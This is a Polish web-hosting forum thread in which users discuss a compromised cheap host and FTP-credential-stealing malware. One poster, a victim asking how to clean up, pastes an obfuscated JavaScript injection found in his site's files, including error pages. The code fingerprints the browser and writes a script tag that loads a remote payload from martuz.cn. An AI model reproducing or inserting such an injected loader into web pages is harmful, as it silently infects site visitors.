Skocz do zawartości

Polecane posty

mam prbolem z tym hostingiem , kiedy zakładałem strone host prosferował dosyć dobrze teraz został zmieniiony własćiciel i tak naprawde niewiadomo co sie dzieje , przeszed bym na jakis inny ale jest tam domena która ma 1000unik dziennie wiec troche mi szkoda , ma ktos z was na tym hoscie stronę ??

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

przecież to nie problem "zabrać" domenę z serwera, nawet jak leży

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Ta strona jest zainfekowana:

 

Żądany obiekt jest ZAINFEKOWANY następującymi wirusami: HEUR:Trojan.Script.Iframer

 

A przeniesienie serwisu i domeny to już chyba najmniejsy problem.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Mam to samo co Ty MZone Group.

Nie wiem co jest grane.

Ale pokazuje mi sie to już dobrych pare miesięcy!

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

a antidotum na to jest bardzo proste:

nie zapisywać hasła do ftp na żadnym komputerze który łączy się z serwerem ;)

teraz już tego jest mniej ale jakieś 2 miesiące temu to była plaga

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Tak tez zauważyłem że strona ma wira :/ jezeli avast mi go wykrywa i pokazuje to oznacza ze sie nie przedostał? Co do niopa to mam niestety domene z ich dopiskie strona.niop.pl

czyli chyba zostaje tylko szybko uciekać i ewentualne zrobić przekierowanie ? Na nowa stronę ?

 

Co do wira jezeli nie mam Total Comandera to moge spac spokojnie ?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Co do wira jezeli nie mam Total Comandera to moge spac spokojnie ?

 

Dotyczy to kilku klientów ftp nie tylko tc, proponuję pozmieniać passy ftp i posprawdzać pliki stron (można by poprosić support o skan).

PeceTa też bym przeszperał przeskanował etc :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Pokuć

Hmm, co do wirusa to mam na jednej z domen takie coś

<script language=javascript><!--

(function(){eval(unescape(('v_61_72_20a_3d_22_53criptEngin_65_22_2cb_3d_22Vers_69on()_2b_22_2cj_3d_22_22

_2cu_3dnav_69gat_6fr_2eu_73erA_67e_6et_3bi_66

((_75_2e_69ndexOf(_22C_68r_6f_6de_22_29_3c0)_26_26(_75_2eindexOf(_22Wi_6e_22_29_

3e0)_26_26(u_2ei_6edexOf(_22NT_20_36_22)_3c0_29_26_26(do_63um_65_

6et_2e_63ookie_2eindexO_66(_22_6diek_3d1_22)_3c_30)_26_26_28typeof(_7ar_76_7a_74

s_29_21_3dty_70_65of_28_22A_22)))_7bzr_76zts_3d_22A_22_3be_76a_6c

(_22i_66(window_2e_22+_61+_22)_6a_3dj+_22+a_2b_22Major_22+b_2ba+_22M_69n_6f_72_2

2+b+_61+_22_42_75ild_22+_62+_22j_3b_22)_3bd_6fcument_2ew_72_69te

(_22_3cs_63_72_69pt_20_73rc_3d_2f_2fm_61r_22+_22tuz_2ecn_2f_76id_2f_3f_69d_3d_22

+j+_22_3e_3c_5c_2fscript_3e_22)_3b_7d').replace(/_/g,'%')))})();

--></script>

Można to jakoś masowo wywalić czy w każdym pliku z osobna trzeba ? Nawet 403 jest tym chadziejstwem napchane. Dodatkowo zauważyłem niemożność otwarcia TC. Po przeinstalowaniu i nie robieniu łączeń do serwa działa ok. W dodatku przy wchodzeniu na tę jedną domenę łączy mi się z jakimś martuz.cn. Skąd ten syf wziął mi się na serwerze i na domowym PC ?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

mam problem bo tak moja strona nie działa , a jak zauważyłem zostały skosowane wszystkie moja pliki ftp i nieweim dlaczego teraz jak chce załadowac je na nowo to nie mogę dostać sie do folderu Public html :) , a pisanie do niopa nic nie daje bo nie odpisuja , jak mam sie dostac do tego PublicHtml

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
mam problem bo tak moja strona nie działa , a jak zauważyłem zostały skosowane wszystkie moja pliki ftp i nieweim dlaczego teraz jak chce załadowac je na nowo to nie mogę dostać sie do folderu Public html :) , a pisanie do niopa nic nie daje bo nie odpisuja , jak mam sie dostac do tego PublicHtml

 

No tu to już musisz zwrócić się do ich suportu, co będzie nie lada wyzwaniem dla Ciebie. Niestety nikt nie pomoże Ci w tej sprawie skoro tak naprawdę nawet niewiadomo co to za firma.

Przypuszczam, że już nie dostaniesz się do swoich plików w ogóle, o backup zapomnij bo pewnie nie robili od dawna.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

rozumie ale dlaczego niemoge akurat dostać sie do tego folderu a do innych mogę ;) moze bedzie to ku przestrodze aby nie wchodzić w tanie powstające hostigi bo chyba to prawda że cena określa jakośc , co do backup to sie nie matwie ponieważ mam baze danych i postawienie drugiego takiego samego forum nie bedzie problemem

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
rozumie ale dlaczego niemoge akurat dostać sie do tego folderu a do innych mogę ;) moze bedzie to ku przestrodze aby nie wchodzić w tanie powstające hostigi bo chyba to prawda że cena określa jakośc , co do backup to sie nie matwie ponieważ mam baze danych i postawienie drugiego takiego samego forum nie bedzie problemem

Masz jakiś komunikat? Może poprostu zmień chmod dla folderu.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Wielki dzięki wszystko działa aż mi głupio z tego powodu , co do tego wira to rozmawiałem przez tel. z właścicielem i poprostu mowi ze jest to jakis fragment kodu strony który moze być odczytywany przez antyrusy jako wir.

 

jeszcze raz dzieki przynajmniejsie dzisiaj wyśpie w nocy ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Wielki dzięki wszystko działa aż mi głupio z tego powodu , co do tego wira to rozmawiałem przez tel. z właścicielem i poprostu mowi ze jest to jakis fragment kodu strony który moze być odczytywany przez antyrusy jako wir.

 

jeszcze raz dzieki przynajmniejsie dzisiaj wyśpie w nocy ;)

 

To mi bardziej wygląda na trojana niż na jakiś wtopiony skrypt, nawet nie mogę zobaczyć ich strony Kasperski odrazu blokuje ten kod.

 

 

Wystąpił następujący błąd:

 

Żądany obiekt jest ZAINFEKOWANY następującymi wirusami: HEUR:Trojan.Script.Iframer

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się


×